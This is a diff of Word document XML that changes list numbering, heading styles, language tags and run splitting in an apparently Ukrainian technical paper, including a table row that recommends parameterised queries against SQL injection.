+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2">
     <w:nsid w:val="2F5175DD"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="297E440E"/>
@@ -27181,7 +28198,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2">
+  <w:abstractNum w:abstractNumId="3">
     <w:nsid w:val="35E3142D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -27294,7 +28311,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3">
+  <w:abstractNum w:abstractNumId="4">
     <w:nsid w:val="48577FED"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="CFAEF4BA"/>
@@ -27416,7 +28433,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4">
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="4B5255B3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0442CE44"/>
@@ -27565,7 +28582,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5">
+  <w:abstractNum w:abstractNumId="6">
     <w:nsid w:val="53912F4C"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="53BE25C4"/>
@@ -27714,7 +28731,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6">
+  <w:abstractNum w:abstractNumId="7">
     <w:nsid w:val="54BF63B5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="31EECCA0"/>
@@ -27827,7 +28844,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7">
+  <w:abstractNum w:abstractNumId="8">
     <w:nsid w:val="599D32D5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -27940,7 +28957,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8">
+  <w:abstractNum w:abstractNumId="9">
     <w:nsid w:val="64277235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="67102D8E"/>
@@ -28053,7 +29070,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9">
+  <w:abstractNum w:abstractNumId="10">
     <w:nsid w:val="6E2B310E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -28166,7 +29183,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10">
+  <w:abstractNum w:abstractNumId="11">
     <w:nsid w:val="7DDD64F0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="04190021"/>
@@ -28280,37 +29297,40 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="3">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="6">
     <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="4">
-    <w:abstractNumId w:val="1"/>
-  </w:num>
-  <w:num w:numId="5">
-    <w:abstractNumId w:val="8"/>
-  </w:num>
-  <w:num w:numId="6">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="8">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="9">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="12">
+    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
@@ -28474,6 +29494,26 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="20"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="004553F1"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="36"/>
+      <w:szCs w:val="36"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
   </w:style>
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
@@ -28657,6 +29697,21 @@
       </w:tblCellMar>
     </w:tblPr>
   </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="20">
+    <w:name w:val="Заголовок 2 Знак"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="004553F1"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="36"/>
+      <w:szCs w:val="36"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -28819,6 +29874,26 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="20"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="004553F1"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="36"/>
+      <w:szCs w:val="36"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
   </w:style>
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
@@ -29001,6 +30076,21 @@
         <w:right w:w="108" w:type="dxa"/>
       </w:tblCellMar>
     </w:tblPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="20">
+    <w:name w:val="Заголовок 2 Знак"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="004553F1"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="36"/>
+      <w:szCs w:val="36"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>
@@ -29295,7 +30385,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DF0FBC63-C6ED-4E1F-9A66-6A105C944A9E}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{78AC16E4-7FEA-41D9-9AC3-12F5C364D1F4}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -488,7 +488,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>ілки, в результаті чого вийшов графік стандартного життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
+        <w:t xml:space="preserve">ілки, в результаті чого вийшов графік </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>стандартного</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3840,7 +3858,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -3889,7 +3906,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -4098,7 +4114,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -4401,7 +4416,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -4414,7 +4428,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -6590,7 +6603,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -6677,15 +6689,13 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -7399,7 +7409,7 @@
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -10236,7 +10246,7 @@
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -18863,9 +18873,39 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся в тому, що всі запити </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>SQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18874,7 +18914,77 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся в тому, що всі запити SQL, HQL, OSQL, NoSQL і процедури, що вимагають збережених процедур захищені з використанням підготовлених операторів або параметризації запитів, і, таким чином, не сприйнятливих до SQL ін'єкції</w:t>
+              <w:t>HQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>OSQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>NoSQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> і процедури, що вимагають збережених процедур захищені з використанням підготовлених операторів або параметризації запитів, і, таким чином, не сприйнятливих до </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>SQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ін'єкції</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18908,7 +19018,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18943,7 +19053,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18978,7 +19088,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -21905,17 +22015,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.1</w:t>
+              <w:t>5.1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -22172,17 +22272,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.2</w:t>
+              <w:t>5.2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -22451,17 +22541,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.3</w:t>
+              <w:t>5.3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -22546,17 +22626,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>безпеки</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.</w:t>
+              <w:t>безпеки.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -22708,17 +22778,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.4</w:t>
+              <w:t>5.4</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -23049,17 +23109,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.5</w:t>
+              <w:t>5.5</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -23286,17 +23336,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.6</w:t>
+              <w:t>5.6</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -23513,17 +23553,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.7</w:t>
+              <w:t>5.7</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -23688,7 +23718,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -24442,7 +24471,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -24709,7 +24737,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -24717,7 +24744,7 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:firstLine="348"/>
+        <w:ind w:left="0" w:firstLine="360"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -24725,7 +24752,6 @@
